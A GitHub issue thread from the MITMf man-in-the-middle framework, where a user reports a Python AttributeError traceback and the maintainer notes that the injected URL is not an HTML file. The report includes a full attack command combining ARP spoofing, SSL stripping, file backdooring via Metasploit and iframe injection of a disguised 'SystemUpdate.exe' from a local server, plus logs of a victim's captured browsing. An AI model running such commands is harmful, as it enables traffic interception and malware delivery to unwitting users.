### ISSUE TITLE
exceptions.AttributeError: 'NoneType' object has no attribute 'write'

### ISSUE THREAD

**Issue by riramar** [byt3bl33d3r/MITMf#330]
Everything seems to be working but I'm getting the error below for these parameters:
# python mitmf.py -k -i wlan0 --spoof --arp --gateway 192.168.1.1 --inject --html-url http://192.168.1.111:3000/demos/SystemUpdate.exe --filepwn

@@@@@@@@@@   @@@  @@@@@@@  @@@@@@@@@@   @@@@@@@@  
@@@@@@@@@@@  @@@  @@@@@@@  @@@@@@@@@@@  @@@@@@@@  
@@! @@! @@!  @@!    @@!    @@! @@! @@!  @@!  
!@! !@! !@!  !@!    !@!    !@! !@! !@!  !@!  
@!! !!@ @!@  !!@    @!!    @!! !!@ @!@  @!!!:!  
!@!   ! !@!  !!!    !!!    !@!   ! !@!  !!!!!:  
!!:     !!:  !!:    !!:    !!:     !!:  !!:  
:!:     :!:  :!:    :!:    :!:     :!:  :!:  
:::     ::    ::     ::    :::     ::    ::  
 :      :    :       :      :      :     :        

[*] MITMf v0.9.8 - 'The Dark Side'
|
|_ Net-Creds v1.0 online
|_ Inject v0.4
|_ Spoof v0.6
|  |_ ARP spoofing enabled
|_ FilePwn v0.3
|  |_ BDFProxy v0.3.2 online
|  |_ Connected to Metasploit v4.12.15-dev
|_ Sergio-Proxy v0.2.1 online
|_ SSLstrip v0.9 by Moxie Marlinspike online
|
|_ MITMf-API online
- Running on http://127.0.0.1:9999/ (Press CTRL+C to quit)
  |_ HTTP server online
  |_ DNSChef v0.4 online
  |_ SMB server online

...
2016-08-14 22:18:00 192.168.1.101 [type:Other-Other os:Other] [FilePwn] Patching failed
2016-08-14 22:49:59 192.168.1.101 [type:Chrome-52 os:Windows 7] www.ideafixa.com
2016-08-14 22:49:59 192.168.1.101 [type:Chrome-52 os:Windows 7] www.clickinteriores.com.br
2016-08-14 22:50:00 192.168.1.101 [type:Chrome-52 os:Windows 7] blog.obravip.com.br
2016-08-14 22:50:00 192.168.1.101 [type:Chrome-52 os:Windows 7] [Inject] Injected HTML Iframe: www.ideafixa.com
2016-08-14 22:50:01 192.168.1.101 [type:Chrome-52 os:Windows 7] www.ideafixa.com
2016-08-14 22:52:46 192.168.1.101 [type:Chrome-52 os:Windows 7] 1.bp.blogspot.com
2016-08-14 22:52:47 192.168.1.101 [type:Chrome-52 os:Windows 7] 3.bp.blogspot.com
2016-08-14 22:52:56 192.168.1.101 [type:Chrome-52 os:Windows 7] www.ideafixa.com
2016-08-14 22:52:56 192.168.1.101 [type:Chrome-52 os:Windows 7] www.arrumadissimo.com.br
Unhandled Error
Traceback (most recent call last):
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/python/log.py", line 101, in callWithLogger
    return callWithContext({"system": lp}, func, _args, *_kw)
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/python/log.py", line 84, in callWithContext
    return context.call({ILogContext: newCtx}, func, _args, *_kw)
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/python/context.py", line 118, in callWithContext
    return self.currentContext().callWithContext(ctx, func, _args, *_kw)
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/python/context.py", line 81, in callWithContext
    return func(_args,_*kw)
--- <exception caught here> ---
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/internet/posixbase.py", line 597, in _doReadOrWrite
    why = selectable.doRead()
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/internet/tcp.py", line 209, in doRead
    return self._dataReceived(data)
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/internet/tcp.py", line 215, in _dataReceived
    rval = self.protocol.dataReceived(data)
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/protocols/basic.py", line 578, in dataReceived
    why = self.rawDataReceived(data)
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/web/http.py", line 532, in rawDataReceived
    self.handleResponsePart(data)
  File "/root/bin/MITMf/core/sslstrip/ServerConnection.py", line 187, in handleResponsePart
    self.client.write(data)
  File "/root/.virtualenvs/MITMf/local/lib/python2.7/site-packages/twisted/web/http.py", line 957, in write
    self.channel.write(data)
exceptions.AttributeError: 'NoneType' object has no attribute 'write'

**Comment by byt3bl33d3r** [comment]
Sooo I'm guessing http://192.168.1.111:3000/demos/SystemUpdate.exe is not an HTML file which is probably the issue here...

**Comment by riramar** [comment]
Yes... sorry... wrong URL...
